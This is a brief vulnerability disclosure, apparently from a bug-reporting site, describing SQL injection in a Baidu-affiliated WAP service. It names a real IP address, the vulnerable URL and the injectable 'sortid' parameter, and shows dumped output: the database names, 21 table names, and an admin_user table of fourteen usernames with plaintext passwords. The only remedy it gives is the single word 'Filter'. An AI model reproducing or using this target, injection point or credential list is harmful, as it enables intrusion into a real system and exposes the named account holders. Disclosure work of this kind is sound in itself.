SQL Injection for a Baidu business (leakage of Administrator account and password)
Http: // 42.62.39.206/wap/fl2 /? Mo = 1 & sortid = 12 & cm = M3140060 & site = 0
Sortid Parameters
available databases [4]:[*] baikan[*] information_schema[*] mysql[*] test
Database: baikan [21 tables] +----------------------------+ | admin_user | | baikan_psort | | baikan_saomiao_block_log | | baikan_saomiao_keyword_log | | baikan_sort | | channel_bookorder_duoku | | channel_bookorder_duokubak | | cmread_book_info | | global_level | | wap_advertisement | | wap_advertposition | | wap_block | | wap_blockbooks | | wap_blockchildren | | wap_cooperater | | wap_cpbooks | | wap_feedback | | wap_keyword | | wap_keywordposition | | wap_page | | wap_page_block | +----------------------------+
+------------------+-----------+| uname | password |+------------------+-----------+| caiwu | GAZfPh || chenchi | xyaXEq || disanfang | uaHFhK || guojieming | 123456 || guoyunjiao | ftgA7I || hejianqiu | RVhzuS || jiangwenjuan | vYB2iS || languiwei | languiwei || liangyu | AJ6GIZ || liuyijiang | c9NJ7a || liyafei | VeaP3K || lougaohan | han000 || qixin | aPA8uw || shangguanshunmin | 3826353 |
Solution:
Filter